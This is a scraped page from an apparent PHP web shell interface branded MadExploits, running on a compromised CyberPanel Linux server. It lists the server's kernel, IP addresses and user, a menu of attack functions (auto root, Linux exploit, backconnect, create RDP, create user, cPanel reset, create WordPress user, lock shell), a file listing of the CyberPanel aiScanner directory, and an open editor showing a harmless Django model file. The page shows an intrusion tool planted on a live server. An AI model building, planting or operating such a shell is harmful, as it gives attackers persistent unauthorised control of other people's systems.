Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
aiScanner /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
management
[ DIR ]
drwxr-xr-x
migrations
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
admin.py
63
B
-rw-r--r--
aiScannerManager.py
45.33
KB
-rw-r--r--
api.py
26.63
KB
-rw-r--r--
apps.py
150
B
-rw-r--r--
models.py
12.03
KB
-rw-r--r--
scheduled_views.py
12.04
KB
-rw-r--r--
status_api.py
8.32
KB
-rw-r--r--
status_models.py
1.43
KB
-rw-r--r--
tests.py
60
B
-rw-r--r--
urls.py
2.01
KB
-rw-r--r--
views.py
25.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : status_models.py
from django.db import models from django.utils import timezone class ScanStatusUpdate(models.Model): """Real-time scan progress updates""" scan_id = models.CharField(max_length=100, db_index=True, primary_key=True) phase = models.CharField(max_length=50) # starting, discovering_files, scanning_files, completing, completed progress = models.IntegerField(default=0) # 0-100 # File tracking current_file = models.TextField(blank=True) files_discovered = models.IntegerField(default=0) files_scanned = models.IntegerField(default=0) files_remaining = models.IntegerField(default=0) # Threat tracking threats_found = models.IntegerField(default=0) critical_threats = models.IntegerField(default=0) high_threats = models.IntegerField(default=0) # Activity description activity_description = models.TextField(blank=True) # Timestamps last_updated = models.DateTimeField(auto_now=True) created_at = models.DateTimeField(auto_now_add=True) class Meta: db_table = 'ai_scanner_status_updates' ordering = ['-last_updated'] indexes = [ models.Index(fields=['scan_id', '-last_updated']), ] def __str__(self): return f"Status update for {self.scan_id} - {self.phase} ({self.progress}%)" @property def is_active(self): """Check if scan is still active""" return self.phase not in ['completed', 'failed', 'cancelled']
Close